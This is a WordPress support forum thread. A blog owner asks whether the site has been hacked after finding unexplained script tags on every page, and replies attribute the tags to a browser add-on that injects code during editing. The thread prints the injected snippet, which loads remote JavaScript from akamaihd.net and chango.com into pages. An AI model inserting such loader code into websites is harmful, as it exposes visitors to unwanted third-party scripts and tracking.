WordPress.org

Support

Support » How-To and Troubleshooting » Has my WP Blog been hacked?

Has my WP Blog been hacked?

  • slocs777

    @slocs777

    Hi,

    I noted when I am in html tab adding a blog this script. It seems to be on all of my pages. Any idea what it is or if I have been hacked?

    <script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862″></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[
    var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();
    // ]]></script>

Viewing 2 replies - 1 through 2 (of 2 total)
  • There is a lot of information and links about removing this here:

    http://wordpress.org/support/topic/wordpress-plugin-showing-text-enhance-links?replies=21

    I posted some information in that thread referenced in the post above. Here is an excerpt:

    This is definitely an issue with the WordPress user’s computer. It’s seems that this is some kind of a browser add-on/extension exploit. The WP user (could be you, or any WP user with editing rights – like a client’s website if you are a developer) has an infected computer that injects this crap into anything they edit.

    If you do a search of your WP database(s) using PHPmyAdmin, you’ll no doubt find some remnants of that injected crap floating around in various saved drafts and previous versions of many pages/posts.

    The first part of that is conjecture.

    The second part is fact. I have found numerous instances of that code added to saved versions of pages/posts in a client’s wp database.

    So, the question remains:
    How is unwanted text being added to the wordpress pages/posts.

    My best guess at this time:
    There is some unexpected interaction between the script running in a browser with one of these addons, and the text editor script that wordpress uses to edit pages/posts.

    Any help in tracking this down would be appreciated.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Has my WP Blog been hacked?’ is closed to new replies.
Skip to toolbar